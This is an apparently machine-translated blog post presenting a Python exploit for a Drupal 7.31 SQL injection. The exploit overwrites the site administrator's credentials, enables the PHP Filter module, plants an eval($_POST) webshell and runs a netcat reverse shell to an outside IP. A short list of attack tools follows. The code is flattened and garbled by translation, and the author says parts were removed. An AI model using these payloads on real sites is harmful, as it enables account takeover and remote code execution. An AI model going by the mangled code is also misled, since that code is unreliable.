Drupal 7.31 SQL injection vulnerability exploitation and EXP, drupal7.31

Drupal 7.31 SQL injection vulnerability exploitation and EXP, drupal7.31
Zookeeper

This article and program will be published a few days later. However, it seems that the Drupal hole has not attracted much attention, so I do not have to pay attention to it. But to be honest, this hole is very powerful. Of course, this is not expected by Drupal itself.

0x00

First of all, this vulnerability is really large, and Drupal is also widely used. It should be able to scan many vulnerable hosts, but batch processing may cause great losses to the other website, so I just wrote an Exp. However, it seems that this hole is not very important, which is extremely inappropriate.

 

0x01

I have already explained the vulnerability principles and POC in my blog. Here I will focus on the exploitation process. With the POC effect, I mainly use it in remote code execution and GetShell.

Remote Code Execution and exploitation:

1. Log On As a super Administrator

2. Enable the site PHP Filter Function

3. Create aticle, select PHP_CODE mode (edit php code), and preview

4. After the preview page is loaded, the code will be executed.

 

Corresponding to the codeExecution function of the DrupalSQLin class in EXP, what this function does is to automate the above process. It is difficult for me to write this part. The problem occurred when requests sent the attachment. Finally, I was unable to splice the Post data packets by myself. The splicing structure is as follows:

When debugging a program, it is very effective to use burpsuite for assistance. With burpsuite, you can clearly see the data packet format and field content of each interaction.

GetShell exploitation:

1. Log On As a super Administrator

2. Enable the PHP Filter function of the website.

3. Create a block and edit the PHP code.

4. Save with PHP_CODE

THE Post request structure is as follows:

The disadvantage of using python to send packets is that it is not intuitive. We cannot know whether our data packet structure is correct. In this case, we can use the proxies parameter of the requests module to set the proxy to burpsuite, then you can analyze and debug it. However, you may have less permission to use the new block method to obtain the shell.

When constructing a request package, there are two fields: form_build_id and form_token. They are the tokens provided by Drupal to prevent CSRF (similar to csrf protection in Django ). Before sending a package, you must find these two items and use a small crawler.

Another key point is to save the cookie after Simulated login, because the following attacks will carry the admin cookie; otherwise, an error will occur.

0x02

Command Execution result: Obtain the Rebounding shell from the local listening port

Test environment: Local Test

Program Execution: such

The main thread will be blocked when receiving the bounce shell.

Reverse shell effect;

0x03

This vulnerability is very powerful and brings great harm to the other host. It also involves user coverage and changes to the original website settings. Therefore, I am not prepared to share the code completely here.

If you want to use it implicitly, you need to do a lot of auxiliary work. For example, when enabling the php filter, it involves crawling the original configuration information of the website by a small crawler. The Administrator's acquisition method is also improved.

The following code is released:

Simulated login function

Enable PHP Filter:

Code execution:

0x04

This kind of Web EXP compilation requires a lot of details. I even used burpsuite during debugging. And this process also makes me very sick.

In addition, the program is only used for security research and study exchanges. Please do not use it for illegal purposes.

0x05

I will share some important parts of the program that I have deleted. The program cannot run now, or I will only use it for learning and communication:

# Coding = utf-8import requestsimport reimport sysimport socketimport extends urllib2import cookielibimport mimetypesimport extends DrupalSQLin (): ''' get super Administrator account password (overwrite) ''' def getAdmin (self, url ): try: # admin is owned, pass is thanksdata = {"name [0; update users set name = 'admin ', pass = '$ S $ DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' where uid = 1; #] ": 'admin'," name [0] ":" 111111 ", "pass": "shit2 "," Test2 ":" test "," form_build_id ":" "," form_id ":" user_login_block "," op ":" Log + in "} r = requests. post (url, timeout = 10, data = data) page = r. contentif page. count ("mb_strlen () expects parameter 1 to be string ")! = 0: print "[+] Get Admin Success: admin/thanks" failed t Exception, e: print "Exception exists: % s "% ereturn None ''' use the super administrator to log on to ''' def login (self, url): # get tokenpattern = re. compile (r'name = "form_build_id" value = "(. +) "') r = requests. get (url) form_build_id = pattern. findall (r. content) [0] login_data = {'name': 'admin', 'pass': 'thank', 'form _ build_id ': form_build_id, # csrf token 'form _ id': 'user _ login_block ', 'Op': 'Lo G + in '} r = requests. post (url, data = login_data) page = r. contentif page. count ("Log out ")! = 0: print '[+] Admin Log in Success! '# Obtain cookiescj = cookielib. LWPCookieJar () opener = urllib2.build _ opener (urllib2.HTTPCookieProcessor (cj) login_path = 'HTTP: // 127.0.0.1/drupal-7.31/'pattern = re. compile (r'name = "form_build_id" value = "(. +) "') r = requests. get (login_path) form_build_id = pattern. findall (r. content) [0] data = {'name': 'admin', 'pass': 'thank', 'form _ build_id ': form_build_id, # csrf token 'form _ id': 'user _ login_block ', 'Op': 'Log + in '} Post_data = urllib. urlencode (data) request = urllib2.Request (login_path, post_data) html = opener. open (request ). read () if cj: cj.save('cookiefile.txt ') else: print 'get Cookies Error, Exploit Failed! 'Sys. exit () f = open('cookiefile.txt ', 'R') cookiesfile = f. read () pattern = re. compile (r'set-Cookie3: (. ++ ?) = (. + ?); ') Ret = pattern. findall (cookiesfile) cookies = {ret [0] [0]: str (ret [0] [1]). replace ('"','')} return cookieselse: return None ''' enable PHP Filter ''' def openPhpFilter (self, url): cookies = self. login (url) url = "% s" % (url ,"? Q = admin/modules/list/confirm ") pattern_id = re. compile (r'name = "form_build_id" value = "(. +) "') pattern_token = re. compile (r'name = "form_token" value = "(. +) "') r = requests. get (url, cookies = cookies) form_build_id = pattern_id.findall (r. content) [0] # csrf tokenform_token = pattern_token.findall (r. content) [0] post_data = {'Les les [Core] [php] [enable] ': '1', 'Les les [Core] [color] [enable]': '1', 'Les les [Core] [comment] [Enable] ': '1', 'Les les [Core] [contextual] [enable]': '1', 'Les les [Core] [dashboard] [enable] ': '1', 'Les les [Core] [dblog] [enable] ': '1', 'Les les [Core] [field_ui] [enable]': '1 ', 'modules [Core] [help] [enable] ': '1', 'modules [Core] [list] [enable]': '1 ', 'modules [Core] [menu] [enable] ': '1', 'modules [Core] [number] [enable]': '1 ', 'modules [Core] [overlay] [enable] ': '1', 'modules [Core] [path] [enable]': '1 ', 'modulles [Core] [rdf] [enabl E] ': '1', 'Les les [Core] [search] [enable]': '1', 'Les les [Core] [shortcut cut] [enable] ': '1', 'Les les [Core] [toolbar] [enable] ': '1', 'form _ build_id': form_build_id, 'form _ token': form_token, 'form _ id': 'System _ Les ', 'Op': 'save + configuration'} try: r = requests. post (url, data = post_data, cookies = cookies) print '[+] Open PHP Filter Success! 'Failed t Exception, e: print "[+] Exception: % s Exploit Failed! "% Esys. exit () ''' get webshell :? Q = admin/structure/block/add''' def getShell (self, url, content = "<? Php @ eval ($ _ POST ['cmd']);?> "): Print" [+] Get Shell Module \ nNotice: You can use this part get a shell. "cookies = self. login (url) url = "% s" % (url ,"? Q = admin/structure/block/add & render = overlay ") pattern_id = re. compile (r'name = "form_build_id" value = "(. +) "') pattern_token = re. compile (r'name = "form_token" value = "(. +) "') r = requests. get (url, cookies = cookies) form_build_id = pattern_id.findall (r. content) [0] # csrf tokenform_token = pattern_token.findall (r. content) [0] post_data = {'title': '', 'info': 'shit2', 'body [value] ': content, 'body [format]': 'php _ Code','re Gions [bartik] ':'-1', 'regions [seven] ':'-1', 'visibility ': '0', 'pages ':'', 'custom': '0', 'visibility _ active_tab ': 'edit-path', 'form _ build_id': form_build_id, 'form _ token': form_token, 'form _ id': 'block _ add_block_form ', 'Op': 'save + Block'} rp = requests. post (url, data = post_data) page_content = rp. contentif page_content.count ("created ")! = 0: print 'get Shell Success: % s /? Q = admin/structure/block & render = overlay '% urlreturn "% s /? Q = admin/structure/block "% urlelse: print 'get Shell Failed! ''' Remote Code Execution :? Q = node/add/article ''' def codeExecution (self, url, code ): print ''' [+] Code Execution ModulePlease make sure that keep nc listener opening when you want to get a reverse shell.1.First, you need to exe nc-vv-l-p <port> 2. then, you can run this script with command 'nc <ip> <port>-e/bin/bash 'tips: If you want a echo, add reg by youself. '''cookies = self. login (url) url = "% s" % (url ,"? Q = node/add/article ") r = requests. get (url, cookies = cookies) pattern_id = re. compile (r'name = "form_build_id" value = "(. +) "') pattern_token = re. compile (r'name = "form_token" value = "(. +) "') form_build_id = pattern_id.findall (r. content) [0] # csrf token # concatenate attachmentBOUND = mimetools. choose_boundary () content_type = "multipart/form-data; boundary = % s" % BOUNDCRLF = "\ r \ n" fields = {'title': 'chongrui ', 'Field _ tags [und] ': CRLF, 'body [und] [0] [summary]': CRLF, 'body [und] [0] [value] ':' <? Php echo shell_exec ("% s") ;?> '% Code, 'body [und] [0] [format]': 'php _ Code', 'field _ image [und] [0] [fid] ': '0', 'field _ image [und] [0] [display] ': '1', 'changed': CRLF, 'form _ build_id ': form_build_id, 'form _ token': form_token, 'form _ id': 'Article _ node_form ', 'log': CRLF, 'name': 'admin', 'date': CRLF, 'status': '1', 'promote': '1', 'additional _ settings _ active_tab ': 'edit-revision-information', 'op ': 'preview'} L = [] for k, v in fields. items (): L. append ('--' + BOUND) L. append ('\ n') L. append ('content-Disposition: form-data; name = "% s" % s' % (k, "\ n") if v! = CRLF: L. append (CRLF) L. append (v) L. append ('\ n') L. append ('% s --' % BOUND) L. append (CRLF) body = ''for x in L: body + = xheaders = {'content-type': content_type} r = requests. post (url, data = body, cookies = cookies, headers = headers) pai_echo = r. contentif pai_echo.count ("Preview trimmed version") = 0: print 'execution Error! 'Else: print' Execution Success! 'If _ name _ = '_ main _': url = "http: // 127.0.0.1/drupal-7.31/" code = "" print "Target host: % s "% urlprint 'powered by: Exploit <from 91ri Team> \ nQQ: 739858341 'exp = DrupalSQLin () # obtain admin permission exp. getAdmin (url) # enable php filterexp. openPhpFilter ("http: // 127.0.0.1/drupal-7.31/") # getshellexp. getShell (url) # code execution exp. codeExecution (url, 'c :\\\ nc.exe 10.10.10.132 10002-e c :\\\ cmd.exe ')

How can some powerful hackers use full screen code attacks? Enter many English letters? What is the tool?

Tools can be used as an example: 1. metasploit (integrated with various vulnerability exploitation modules, network scanning modules, and custom exp functions) 2. nmap (Network Information scanning tool) 3. burpsuite (software for capturing and modifying data packets by proxy) 4. sqlmap (software for exploiting SQL Injection Vulnerabilities), which is very powerful if you understand these four vulnerabilities.